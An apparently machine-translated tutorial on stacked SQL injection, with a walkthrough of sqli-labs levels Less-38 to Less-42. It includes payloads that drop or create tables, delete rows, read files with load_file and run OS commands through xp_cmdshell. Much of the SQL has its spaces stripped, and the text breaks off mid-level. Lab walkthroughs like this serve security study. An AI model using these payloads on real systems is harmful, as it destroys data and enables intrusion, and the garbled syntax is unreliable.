Title: Stacking Injection Detailed Explanation

0x00 Stack Injection Definition

Stacked injections (stack injection) From the meaning of the noun, you can see that it should be a bunch of sql statements (multiple entries) executed together. This is also true in real use. We know that in mysql, the main thing is to add each statement at the end of the command line; indicates the end of the statement. In this way, we thought about whether we could use multiple sentences together. This is called stacked injection.

0x01 Stacking Injection Principle

In SQL, semicolon (;) is used to represent the end of a SQL statement. Imagine if we continue to construct the next statement after ending a SQL statement, will it be executed together? Therefore, this idea creates stack injection. Unioninjection (union injection) also merges two statements together. Is there any difference between the two? The difference is that the type of statements executed by union or unionall is limited and can be used to execute query statements, while stack injection can execute arbitrary statements. For example, the following example. User input: 1; DELETEFROMproducts server-side sql statement is: Select*fromproductswhereproductid=1; DELETEFROMproducts When the query is executed, the first item displays the query information, and the second item deletes the entire table.

0x02 Limitations of stack injection

The limitation of stack injection is that not every environment can be executed, and may be restricted by the API or database engine. Of course, insufficient permissions can also explain why attackers cannot modify data or call some programs.

This figure is intercepted from the original text because my personal test environment is php+mysql, which can be executed. There are doubts about mysql/php here. But I personally estimate that the original author may be different from my version. Although we mentioned earlier that stacking queries can execute arbitrary SQL statements, this injection method is not very perfect. In our web system, because the code usually only returns one query result, stack injection of the second statement generates an error or the result can only be ignored, and we cannot see the return result in the front-end interface. Therefore, when reading data, we recommend using union (union) injection. At the same time, before using stack injection, we also need to know some database-related information, such as table names, column names, etc.

0x03 Introduction to each database instance

In this section, we will introduce the relevant usage of several types of databases from the perspective of common databases. Basic operations of the database, add, delete, check and modify. The following lists the basic operations of database-related stack injection.

1.Mysql

(1) Create a new table

select*fromuserswhereid=1;createtabletestlikeusers;

After the execution is successful, let’s check whether the new successful table is created.

(2) Delete the newly created test table above

select*fromuserswhereid=1;droptabletest;

(3) Query data select*fromuserswhereid=1;select1,2,3;

(4) Load the file

select*fromuserswhereid=1;selectload_file('c:/tmpupbbn.php');

(4) Modify the data select*fromuserswhereid=1;insertintousers(id,username,password)

values('100','new','new');

2.

Sql server(1) adds data table

select*fromtest;createtablesc3(ssCHAR(8));

(2) Delete the data table

select*fromtest;droptablesc3;

(4) Query data

select1,2,3;select*fromtest;

(5) Modify the data

select*fromtest;updatetestsetname='test'whereid=3;

(5) Execution of the most important stored procedures in sqlserver

select*fromtestwhereid=1;execmaster.xp_cmdshell'ipconfig'

3.Oracle

In the above introduction, we have mentioned that oracle cannot use stack injection. You can see from the figure that when two statements are on the same line, an error will be reported directly. Invalid character. I won't continue to try the next one.

4.Postgresql

(1) Create a new table

select*fromuser_test;createtableuser_data(idDATE);

You can see that the user_data table has been built.

(2) Delete the newly created user_data table above select*fromuser_test;deletefromuser_data;

(3) Query data

select*fromuser_test;select1,2,3;

(4)

Modify data

select*fromuser_test;updateuser_testsetname='modify'wherename='Zhang San';

0x04 Stacked injection of sqllaps column

1.Less-38

Stack Injection - Character Type - GET (1) Source Code

$sql='SELECT

* FROM users WHERE id='$id' LIMIT 0,1';

(2) Test

?id=1’;insert into users(id,username,password) values

(‘38’,’less38’,’hello’)–+

mysql select * from users;

+----+------------------------------+

| id | username | password |

+----+------------------------------+

| 1 | Dumb | Dumb |

| 2 | Angelina

| I-kill-you |

| 3 |

Dummy | p@ssword |

| 4 |

secure | crappy |

| 5 |

Stupid | Stupidity |

| 6 | superman

| genious |

| 7 |

batman | mob!le |

| 8 |

admin | admin |

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan| dumbo |

| 14 | admin4 | admin4 |

| 38 | less38 | hello |

+----+------------------------------+

14 rows in set (0.00 sec)

Found that a less38 user has been added

?id=1’;create table less38 like users;

?id=1’;drop table less38;

2.Less-39

Stack Injection - Integer - GET (1) Source Code

$sql='SELECT * FROM users WHERE id=$id LIMIT

0,1';

(2) Test

?id=1;insert into users(id,username,password) values

(‘39’,’less39’,’hello’)–+

mysql select * from users;

+----+------------------------------+

| id | username | password |

+----+------------------------------+

| 1 | Dumb | Dumb |

| 2 | Angelina

| I-kill-you |

| 3 |

Dummy | p@ssword |

| 4 |

secure | crappy |

| 5 |

Stupid | Stupidity |

| 6 | superman

| genious |

| 7 |

batman | mob!le |

| 8 |

admin | admin |

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan| dumbo |

| 14 | admin4 | admin4 |

| 38 | less38 | hello |

| 39 | less39 | hello |

+----+------------------------------+

15 rows in set (0.00 sec)

You can see that less39 users have been added

?id=1;create table less39 like users;

?id=1;drop table less39;

3.Less-40

Blind - Stack Overflow

$sql='SELECT * FROM users WHERE id=('$id') LIMIT

0,1';

(2) Test

?id=1’); insert into users(id,username,password)

values (‘40’,’less40’,’hello’)–+

mysql select * from users;

+-----+-------------------------------+

| id | username

| password |

+-----+-------------------------------+

| 1 |

Dumb | Dumb |

| 2 | Angelina

| I-kill-you |

| 3 |

Dummy | p@ssword |

| 4 |

secure | crappy |

| 5 |

Stupid | Stupidity |

| 6 | superman

| genious |

| 7 |

batman | mob!le |

| 8 |

admin | admin |

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

dhakkan | dumbo |

| 14 |

admin4 | admin4 |

| 38 |

less38 | hello |

| 39 |

less39 | hello |

| 109 | hello| hello |

| 40 |

less40 | hello |

+-----+-------------------------------+

17 rows in set (0.00 sec)

See the added less40 user

?id=1’);create table less40 like users;

?id=1’);drop table less40;

4.Less-41

Blind - Stack Injection - Integer - GET (1) Source Code

$sql='SELECT * FROM users WHERE id=$id LIMIT

0,1';

(2) Test (blind)

Create users table and increase field values

?id=1; insert into users(id,username,password) values

(‘110’,’less41’,’hello’)–+

mysql select * from users;

+-----+-------------------------------+

| id | username

| password |

+-----+-------------------------------+

| 1 |

Dumb | Dumb |

| 2 | Angelina

| I-kill-you |

| 3 |

Dummy | p@ssword |

| 4 |

secure | crappy |

| 5 |

Stupid | Stupidity |

| 6 | superman

| genious |

| 7 |

batman | mob!le |

| 8 |

admin | admin |

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

dhakkan | dumbo |

| 14 |

admin4 | admin4 |

| 38 |

less38 | hello |

| 39 |

less39 | hello |

| 109 | hello| hello |

| 40 |

less40 | hello |

| 110 | less41 | hello |

+-----+-------------------------------+

18 rows in set (0.00 sec)

Added user less41

?id=1;create table less41 like users; //Add table

?id=1;drop table less41; //Delete table

5.Less-42

Error-reporting stack injection - character-POST (1) source code (login.php):

$username=mysqli_real_escape_string($con1,

$_POST['login_user']);

$password=$_POST['login_password'];

$sql='SELECT * FROM users WHERE

username='$username' and password='$password''; //Password

The variable did not pass during the post process

The processing of the mysql_real_escape_string() function. Therefore, when logging in, we can attack the password option.

(2) Error test

Test statement:

username: any

password: c';drop table me# # Delete the me table

or:

username: any

password:

c';create table me like users# //Create a

me table

Check the table before logging in:

mysql show tables;

+-------------------------+

| Tables_in_security |

+-------------------------+

| emails|

| referers|

| uagents|

| users|

+-------------------------+

4 rows in set (0.00 sec)

Create a table before logging in

username:admin

password:

c';create table less42

like users#

Log in to view the creation table

mysql show tables;

+-------------------------+

| Tables_in_security |

+